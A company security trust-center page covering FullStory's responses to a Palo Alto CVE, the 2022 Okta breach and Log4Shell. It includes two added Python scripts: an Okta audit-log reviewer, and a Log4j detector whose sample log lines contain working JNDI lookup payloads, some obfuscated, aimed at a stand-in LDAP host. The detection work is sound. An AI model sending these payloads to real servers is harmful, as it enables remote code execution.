FullStory is a new kind of platform, designed to help companies answer any question they might have about their digital experience.
Built on a powerful analytics engine, FullStory connects digital interactions to the metrics that matter most to businesses. It proactively surfaces top opportunities for optimization, allowing teams to understand issues, prioritize fixes, remediate bugs, and measure the impact of changes.
With FullStory, product, engineering, and UX teams can align around their customer, break down internal information silos, and achieve company objectives together—faster. The end result? A digital experience their customers and users love.
Trust Center Updates
Response to customers
While FullStory is a fun company, we don’t play around when it comes to security and privacy. Trust is one of our core watchwords and we hold our responsibility as protectors of our customers' information in the highest regard.
FullStory does not use any Palo Alto services to deliver our product, and is not affected by this vulnerability.
Palo Alto DoS Vulnerability Background
To learn more about the background of the vulnerability, see: https://security.paloaltonetworks.com/CVE-2022-0028
Response to customers
While FullStory is a fun company, we don’t play around when it comes to security and privacy. Trust is one of our core watchwords and we hold our responsibility as protectors of our customers' information in the highest regard. FullStory was NOT one of the impacted customers of the Okta breach. Below is some additional information regarding the background, cause, and remediation steps we took regarding the Okta breach in order to maintain the trust you have in our company.
Okta Breach Background
To learn more about the background of the breach, see: https://www.okta.com/blog/2022/04/okta-concludes-its-investigation-into-the-january-2022-compromise/.
Okta detected an unsuccessful attempt to compromise the account of a third-party support engineer. Okta alerted the third-party provider, terminated the user's active Okta sessions, and suspended the user's account. Okta states there is no impact to Auth0, HIPAA, and FedRAMP customers.
Okta stated that the potential impact to customers is limited to the access that support engineers have. Upon conclusion of the third party's forensic examination, Okta determined that 366 customers were impacted.
FullStory & Okta Relationship Transparency Summary:
FullStory uses Okta as our single sign-on (SSO) provider. Using an SSO provider helps to streamline and secure access management for our employees to authorized systems, and to terminate their access upon a job role change or when they exit the company. This in turn keeps our systems safe from unauthorized access and privilege creep, which is essentially where someone accumulates more access than they need when moving positions internally.
FullStory Response & Actions to Okta Breach
FullStory immediately contacted our Okta representative to inquire whether we were one of the 366 customers that were impacted on March 22, 2022. Okta confirmed that FullStory was not an impacted customer. FullStory independently confirmed that our systems were not compromised by completing the following additional steps:
- Reviewed the Okta audit logs for our superuser/admin accounts to look for any suspicious activity.
- Verified that no privileged accounts were created around the time of the suspected breach (January 21, 2022) that we did not create ourselves.
- Conducted assessments of our critical third parties. This included developing a due diligence questionnaire on breach response. After concluding our assessment, we did not identify any of our critical third parties as having been affected by the Okta breach.
FullStory was not impacted by the Okta breach. Further, we did not discover any security issues and did not identify any of our critical third parties as being an Okta customer impacted by the breach.
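The first two review steps above (checking admin audit logs and looking for privileged accounts created around the suspected-breach date that we did not create ourselves) can be turned into a repeatable check. The script below is an added illustration, not FullStory's own tooling: it walks records in the shape of Okta System Log events and flags privileged changes inside a window around the suspected date whose actor is not on an allowlist of known administrators. The sample events, the admin allowlist, and the choice of event types to treat as privileged are all constructed assumptions for this example.

```python
"""Flag privileged-account changes around a suspected-breach date in
Okta System Log style records.

Added example, not FullStory's code. The field names (published, eventType,
actor, target, outcome) follow Okta's System Log shape; the event values and
the actors below are constructed for illustration only."""
import json
from datetime import datetime, timedelta, timezone

# Constructed sample export: a handful of events, one actor we know,
# one "support-tool" actor we do not expect to create or elevate accounts.
SAMPLE_EXPORT = json.dumps([
    {"published": "2022-01-20T15:02:11.000Z", "eventType": "user.session.start",
     "actor": {"alternateId": "alice@example.com", "type": "User"},
     "target": [], "outcome": {"result": "SUCCESS"}},
    {"published": "2022-01-21T03:14:09.000Z", "eventType": "user.lifecycle.create",
     "actor": {"alternateId": "support-tool@example.com", "type": "User"},
     "target": [{"type": "User", "alternateId": "svc-new@example.com"}],
     "outcome": {"result": "SUCCESS"}},
    {"published": "2022-01-21T03:15:40.000Z", "eventType": "user.account.privilege.grant",
     "actor": {"alternateId": "support-tool@example.com", "type": "User"},
     "target": [{"type": "User", "alternateId": "svc-new@example.com"}],
     "outcome": {"result": "SUCCESS"}},
    {"published": "2022-02-10T09:00:00.000Z", "eventType": "user.account.privilege.grant",
     "actor": {"alternateId": "alice@example.com", "type": "User"},
     "target": [{"type": "User", "alternateId": "bob@example.com"}],
     "outcome": {"result": "SUCCESS"}},
])
SAMPLE_EVENTS = json.loads(SAMPLE_EXPORT)

# Constructed allowlist: the identities expected to create or elevate accounts.
KNOWN_ADMINS = {"alice@example.com"}

# Event types treated as privileged changes (assumed set for this example).
PRIVILEGED_EVENT_TYPES = {
    "user.lifecycle.create",         # a new user account was created
    "user.account.privilege.grant",  # an admin role was granted
}


def parse_published(ts):
    """Parse the ISO-8601 UTC timestamp used in the `published` field."""
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%fZ").replace(tzinfo=timezone.utc)


def find_suspicious_privileged_changes(events, suspected_date, window_days=3,
                                       known_admins=KNOWN_ADMINS):
    """Return privileged events within +/- window_days of suspected_date
    (a 'YYYY-MM-DD' string) whose actor is not a known admin."""
    center = datetime.strptime(suspected_date, "%Y-%m-%d").replace(tzinfo=timezone.utc)
    lo, hi = center - timedelta(days=window_days), center + timedelta(days=window_days)
    findings = []
    for ev in events:
        if ev.get("eventType") not in PRIVILEGED_EVENT_TYPES:
            continue
        when = parse_published(ev["published"])
        if not (lo <= when <= hi):
            continue
        actor = ev.get("actor", {}).get("alternateId", "")
        if actor in known_admins:
            continue
        targets = [t.get("alternateId") for t in ev.get("target", [])
                   if t.get("type") == "User"]
        findings.append({"published": ev["published"], "eventType": ev["eventType"],
                         "actor": actor, "targets": targets})
    return findings


if __name__ == "__main__":
    # The suspected-breach date from the write-up; the sample flags two events.
    for f in find_suspicious_privileged_changes(SAMPLE_EVENTS, "2022-01-21"):
        print(f)
```

Every finding this returns is a lead to review by hand, not a verdict: an unexpected actor may be a legitimate automation account, which is exactly the kind of thing an allowlist reconciled against the identity team's records resolves.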
Response to customers
While FullStory is a fun company, we don't play around when it comes to security and privacy. Trust is one of our core watchwords and we hold our responsibility as protectors of our customers' information and of our services in the highest regard. FullStory did NOT find any indicators of compromise that would indicate a successful attack on our systems. Below is some additional information regarding the background, cause, and remediation steps we took regarding the Log4j vulnerability in order to maintain the trust you have in our company.
Log4Shell Vulnerability Background
On December 9, 2021, security researchers discovered a flaw in the code of a software library used for logging. The library, Log4j, is written in Java, a popular programming language with widespread use in other software and applications worldwide. This flaw in Log4j is estimated to be present in over 100 million instances globally. The vulnerability and the attacks against it are being characterized as Log4Shell in the cybersecurity community.
The flaw (a vulnerability, in the security community's terminology) was rated a 10 out of 10 on the Common Vulnerability Scoring System (CVSS) due to the potential impact it can have if leveraged by attackers. Details of the vulnerability can be found in the National Vulnerability Database (NVD) under CVE-2021-44228.
As of Dec. 14, researchers discovered that the fix developed for CVE-2021-44228 was incomplete and the vendor, Apache, released a new fix. On Dec. 17, two new issues were confirmed and the next day Apache released another fix. We expect this cycle of vulnerability and fix to continue as attackers and researchers keep their focus on Log4j. For more information, including recommended remediation actions and resources, see: https://www.cisecurity.org/log4j-zero-day-vulnerability-response
FullStory Response & Actions to Log4j
FullStory worked diligently to ensure that our environment is safe from exploitation and that we have deployed all mitigating measures possible. Keeping customer data safe is our highest priority and our security team is working hard to ensure it remains safe and secure.
Once we became aware of this vulnerability we immediately took steps to determine whether our systems had been exploited via CVE-2021-44228. We found no indicators of compromise within our infrastructure to suggest a successful attack had taken place.
In accordance with our defense-in-depth strategy, we deployed mitigations to prevent a successful attack. Below is a list of the mitigation actions we took:
- Updated our web application firewall (WAF) rules
- Ensured our WAF agents were fully patched
- Reviewed our code to ensure we were properly sanitizing user input within our application layer
- Tested various permutations of the exploit's payload against this layered defense
- Confirmed that the code paths which would be vulnerable to this exploit are not exposed directly to the internet, so any payloads must first pass through our layered defenses, rendering them benign
- Created a Log4j questionnaire to send to our data processors and applicable third parties in order to complete a security assessment
- Confirmed that the security posture of our applicable third parties and data processors with regard to CVE-2021-44228 was adequate
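The WAF-rule and payload-permutation items above come down to one detection problem: recognizing a JNDI lookup string in inbound request data even when it has been URL-encoded or wrapped in nested Log4j lookups so that a naive substring match misses it. The script below is an added example of that defensive check, not FullStory's WAF configuration or code: it normalizes each access-log line (repeated URL-decoding, collapsing `${lower:…}`/`${upper:…}` and `${…:-default}` lookups, lowercasing) and then flags any line that still contains a `${jndi:` lookup. The log lines, IP addresses and hostnames are constructed for the example; the normalization rounds and the lookup forms handled are assumptions that a real rule set would extend.

```python
"""Flag access-log lines carrying Log4j JNDI lookup strings after normalizing
common obfuscations, as a WAF rule or log monitor has to.

Added example, not FullStory's code. Log lines below are constructed; the
addresses and hosts in them are documentation/test ranges, not real targets."""
import re
from urllib.parse import unquote

# Constructed sample lines in Apache combined-log style: the user-agent field
# (last quoted string) and the query string are the usual carriers.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:14:02:01 +0000] "GET /api/ping HTTP/1.1" 200 17 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:14:02:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:09 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.7%2Fb%7D HTTP/1.1" 200 512 "-" "curl/7.79"',
    '10.0.0.9 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.7/c}"',
    '10.0.0.3 - - [10/Dec/2021:14:03:00 +0000] "GET /docs/${version} HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

# ${lower:x} / ${upper:x} resolve to x once case is ignored.
LOOKUP_CASE = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
# ${anything:-default} resolves to its default value when the lookup is empty.
LOOKUP_DEFAULT = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")


def normalize(text, max_rounds=5):
    """Repeatedly URL-decode and collapse innermost lookups until stable,
    then lowercase. Innermost-first resolution is what makes nested
    wrappers unfold; max_rounds bounds work on adversarial input."""
    prev = None
    for _ in range(max_rounds):
        if text == prev:
            break
        prev = text
        text = unquote(text)
        text = LOOKUP_CASE.sub(r"\1", text)
        text = LOOKUP_DEFAULT.sub(r"\1", text)
    return text.lower()


def detect_jndi_lookups(lines):
    """Return one finding per log line whose normalized form contains a
    JNDI lookup; the source IP is the first whitespace-delimited field."""
    findings = []
    for line in lines:
        ip = line.split(" ", 1)[0]
        norm = normalize(line)
        if "${jndi:" in norm:
            findings.append({"ip": ip, "normalized": norm})
    return findings


if __name__ == "__main__":
    # On the constructed sample, the three lines from 10.0.0.9 are flagged;
    # the harmless ${version} path on the last line is not.
    for f in detect_jndi_lookups(SAMPLE_LOG_LINES):
        print(f["ip"], "->", f["normalized"][-60:])
```

Matching on the normalized form rather than the raw bytes is the point: the encoded and nested variants reduce to the same `${jndi:` string, so a single rule covers the permutations instead of a growing list of literal patterns. Blocking at the WAF remains a mitigation, not a substitute for upgrading Log4j, since normalization can always lag a new encoding trick.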
Conclusion & Update
FullStory was not impacted by the Log4j vulnerability.
Currently we are patched against this vulnerability up to Log4j v2.16, and we will continue to monitor the ecosystem for any new variations of this exploit to ensure we stay one step ahead of threat actors.
We completed assessments of our third parties and data processors and found no non-compliance with remediation efforts, nor any parties that were vulnerable.
With regard to CVE-2021-45046, we performed an investigation and determined that our implementation was unaffected by this new variant of the Log4j vulnerability.
To protect against potential future exploits, we plan to roll out Log4j v2.17.1 on 1/12/22.
As a security-conscious organization, we are excited to announce the official launch of the FullStory Security Trust Center. Through this portal, you can request access to our compliance documents, review our standardized questionnaires such as the SIG, and gain a general understanding of our security posture.
Over time, our team will be making changes to this portal as we implement new tools and processes in our environment. You can use the Subscribe button to receive email notifications for when our team has an important update, such as if we have an updated compliance report or if we have a status update regarding a major security vulnerability that has been recently discovered.
-The FullStory Security Compliance Team